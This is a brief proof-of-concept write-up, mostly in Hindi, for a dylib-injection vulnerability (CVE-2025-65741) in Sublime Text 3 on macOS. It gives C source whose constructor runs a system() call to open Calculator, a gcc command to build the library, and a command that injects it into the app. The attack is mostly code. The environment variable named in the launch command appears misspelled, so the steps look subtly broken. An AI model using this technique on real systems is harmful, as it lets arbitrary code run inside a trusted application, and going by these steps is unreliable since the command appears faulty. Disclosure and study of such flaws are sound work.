
CVE-2025-65741 के लिए प्रूफ-ऑफ-कॉन्सेप्ट जो macOS पर Sublime Text 3 में अहस्ताक्षरित कोड के माध्यम से dylib इंजेक्शन प्रदर्शित करता है, एक संकलित .dylib पेलोड और शोषण चरणों के साथ।
Download: https://www.sublimetext.com/3
CVE: CVE-2025-65741 | https://nvd.nist.gov/vuln/detail/CVE-2025-65741
Author: Vinicius Batistella
Version Affected: Sublime Text 3 Build 3208 or prior for macOS
Sublime Text ऐप एक अहस्ताक्षरित कोड इंजेक्शन की सही जांच नहीं करता है, जो एक हमलावर को .dylib lib संकलित करने और ऐप को एप्लिकेशन के संदर्भ में इसे चलाने के लिए मजबूर करने की अनुमति देता है। निम्नलिखित उदाहरण में, Sublime Text ऐप को calc बाइनरी खोलने के लिए मजबूर किया गया था। यह भेद्यता Build 3209 और उसके बाद में ठीक कर दी गई है।
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] Dynalic Library Injection: %s\n", argv[0]);
system("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
}
gcc -dynamiclib injection.c -arch x86_64 -o injection_x86.dylib
DYLIB_INSERT_LIBRARIES=injection_x86.dylib /Applications/Sublime\ Text.app/Contents/MacOS/Sublime\ Text